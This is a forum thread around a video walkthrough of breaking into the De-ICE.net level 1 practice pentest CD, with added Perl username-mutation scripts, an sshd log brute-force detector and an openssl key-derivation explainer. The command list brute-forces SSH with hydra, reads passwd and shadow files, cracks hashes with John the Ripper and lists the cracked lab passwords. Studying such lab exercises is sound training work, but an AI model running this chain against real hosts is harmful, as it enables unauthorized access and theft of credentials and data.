[Video] De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}
De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}
NOT DISK 2
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3194722
Download video: http://www.mediafire.com/?994f2o5ekdqqpzm
What is this?
This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
> Dictionary(s)
Software
Name: De-ICE.net
Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/
Download Link:
Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks
Commands:
Code:
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[+]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[+]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[+]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Song: Aly & Fila - Khepera
Video length: 04:11
Capture length: 08:52
Blog Post: http://g0tmi1k.blogspot.com/2010/02/...-1-disk-1.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1662-%5Bvideo%5D-de-ice-net-v1-1-1-100-%7Blevel-1-disk-2%7D.html OR http://heorot.net/forums/viewtopic.php?f=16&t=367
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
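Seen from the target's side, the two hydra runs in the command list (one guess per username, then a wordlist against a single account) leave a recognisable pattern in sshd's log. The following is an added example, not part of the original post; the log lines, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (not taken from the target): a username sweep,
# a wordlist run against one account, and one ordinary mistyped login.
SAMPLE_LOG = """\
Feb 10 10:00:01 host sshd[411]: Failed password for invalid user adamsa from 192.168.1.50 port 40001 ssh2
Feb 10 10:00:01 host sshd[412]: Failed password for aadams from 192.168.1.50 port 40002 ssh2
Feb 10 10:00:02 host sshd[413]: Failed password for invalid user banterb from 192.168.1.50 port 40003 ssh2
Feb 10 10:00:02 host sshd[414]: Failed password for bbanter from 192.168.1.50 port 40004 ssh2
Feb 10 10:00:03 host sshd[414]: Accepted password for bbanter from 192.168.1.50 port 40004 ssh2
Feb 10 10:05:10 host sshd[420]: Failed password for aadams from 192.168.1.50 port 40010 ssh2
Feb 10 10:05:11 host sshd[421]: Failed password for aadams from 192.168.1.50 port 40011 ssh2
Feb 10 10:05:12 host sshd[422]: Failed password for aadams from 192.168.1.50 port 40012 ssh2
Feb 10 10:05:13 host sshd[423]: Accepted password for aadams from 192.168.1.50 port 40013 ssh2
Feb 10 11:30:00 host sshd[430]: Failed password for ccoffee from 192.168.1.20 port 51000 ssh2
Feb 10 11:30:09 host sshd[430]: Accepted password for ccoffee from 192.168.1.20 port 51000 ssh2
"""

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+)")

def analyse(log, user_threshold=3, fail_threshold=4):
    """Flag sources that sweep usernames and logins that follow guessing.

    The thresholds are illustrative assumptions, not tuned values.
    """
    users = defaultdict(set)   # source -> usernames it failed against
    fails = defaultdict(int)   # (source, user) -> failures since last success
    findings = []
    for line in log.splitlines():
        failed = FAILED.search(line)
        if failed:
            user, src = failed.groups()
            users[src].add(user)
            fails[(src, user)] += 1
            continue
        accepted = ACCEPTED.search(line)
        if accepted:
            user, src = accepted.groups()
            guesses = fails.pop((src, user), 0)
            # A success matters most when the same source was guessing before.
            if guesses >= fail_threshold or len(users[src]) >= user_threshold:
                findings.append(("login-after-guessing", src, user))
    for src, names in users.items():
        if len(names) >= user_threshold:
            findings.append(("username-sweep", src, len(names)))
    return findings
```

The single mistyped login from 192.168.1.20 stays below both thresholds and is not reported.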
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Good job. :) Thanks for submitting this. There's one of the last steps I don't understand though.
Code:
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before? :)
Would be grateful for an answer!
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote: Originally Posted by randalth0r
Good job. :) Thanks for submitting this. There's one of the last steps I don't understand though.
Code:
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before? :)
Would be grateful for an answer!
Trial and error with a bit of googling ;)
and after JTR told me what it thought the root password was, I went with it.
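What the encrypted file itself reveals, as an added example that is not part of the original posts: `openssl enc` with a passphrase writes a `Salted__` marker and an 8-byte salt but no cipher name, so the algorithm has to be found by trial, and `-k` turns the passphrase into key and IV with a single digest pass per block. The sample bytes and function names are constructed; MD5 is the default digest of OpenSSL releases before 1.1.0.

```python
import hashlib

MAGIC = b"Salted__"

# Constructed sample, not the file from the walkthrough: marker, 8-byte salt,
# then 32 bytes standing in for ciphertext.
SAMPLE = MAGIC + bytes.fromhex("0011223344556677") + bytes(range(32))

def inspect_openssl_enc(blob):
    """Report what a salted `openssl enc` file reveals about itself."""
    if not blob.startswith(MAGIC) or len(blob) < 16:
        return None  # not a salted `openssl enc` file
    salt, body = blob[8:16], blob[16:]
    # No algorithm identifier is stored. A padded block mode only shows that
    # the body length is a multiple of the cipher's block size, so a body
    # that fits 16 bytes also fits every 8-byte block cipher.
    block_sizes = [n for n in (8, 16) if body and len(body) % n == 0]
    return {"salt": salt.hex(), "body_len": len(body), "block_sizes": block_sizes}

def evp_bytes_to_key(password, salt, key_len=16, iv_len=16, digest="md5"):
    """Key and IV as derived by `openssl enc -k`: chained, unstretched digests."""
    material, prev = b"", b""
    while len(material) < key_len + iv_len:
        prev = hashlib.new(digest, prev + password + salt).digest()
        material += prev
    return material[:key_len], material[key_len:key_len + iv_len]

if __name__ == "__main__":
    print(inspect_openssl_enc(SAMPLE))
    key, iv = evp_bytes_to_key(b"tarot", SAMPLE[8:16])
    print(key.hex(), iv.hex())
```

Because the derivation is one unsalted-by-iteration digest pass, the strength of such a file rests entirely on the passphrase, which here was the same word as the root password.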
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Nice work, I'm going to have a go at one of the disks once I get it downloaded.
Where are those wordlists you found?
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote: Originally Posted by rshift
Nice work, I'm going to have a go at one of the disks once I get it downloaded.
Where are those wordlists you found?
rshift, he's hosting his wordlists on mediafire, you can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"
g0tmi1k, I see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. Here are two ways to do it with Perl, plus a capitalization switcher for the first letter of each word. There's probably a much easier way to code these, but I'm new to Perl and just did it for the challenge. I didn't bother using filehandles in the script to save output to a new file; you can just redirect it on the command line...
One way to do it:
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
# moves last character of a word to the beginning.
while (<>) {
    print $_;
    chomp $_;
    $char=(chop $_);
    $str=$_;
    print "$char$str\n";
}
Another way:
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
# moves last character of a word to the beginning.
while (<>) {
    print $_;
    $len = length $_;
    # index of the last character before the trailing newline
    $len = $len-2;
    $last_letter = substr($_, $len, 1);
    $first_letters = substr($_, 0, $len);
    print "$last_letter$first_letters\n";
}
This will change the first letter of each word from upper to lowercase and vice versa.
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
while (<>) {
    print;
    @chars = split '', $_;
    $char = shift(@chars);
    if ($char =~ /[A-Za-z]/) {
        $char =~ tr/A-Za-z/a-zA-Z/;
        unshift(@chars, $char);
        print @chars;
    } else {
    }
}
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables ;)
Code:
#! /usr/bin/perl
# usage: perl <filename.pl> <userlist>
while (<>) {
    s/(^\w)/\u$1/gi;
    print;
    s/(^\w)/\l$1/gi;
    print;
}
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote: Originally Posted by g0tmi1k
Trial and error with a bit of googling ;)
and after JTR told me what it thought the root password was, I went with it.
lol ??????? that is the magic ?
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote: Originally Posted by rshift
Nice work, I'm going to have a go at one of the disks once I get it downloaded.
Where are those wordlists you found?
I'm hosting them on my blog:
g0tmi1k: [Site News] February Update - ISOs and Dictionaries
Quote: Originally Posted by mastodongle
rshift, he's hosting his wordlists on mediafire, you can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"
g0tmi1k, I see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. Here are two ways to do it with Perl, plus a capitalization switcher for the first letter of each word. There's probably a much easier way to code these, but I'm new to Perl and just did it for the challenge. I didn't bother using filehandles in the script to save output to a new file; you can just redirect it on the command line...
Thanks for helping out (with the links & script)
Yeah, thinking about it, I should have created/used a script for the video. *I'll use them next time as I've added them to my collection!*
Quote: Originally Posted by micawber
mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables ;)
Handy to know! ;)
Quote: Originally Posted by tyl3rs123
lol ??????? that is the magic ?
Sure?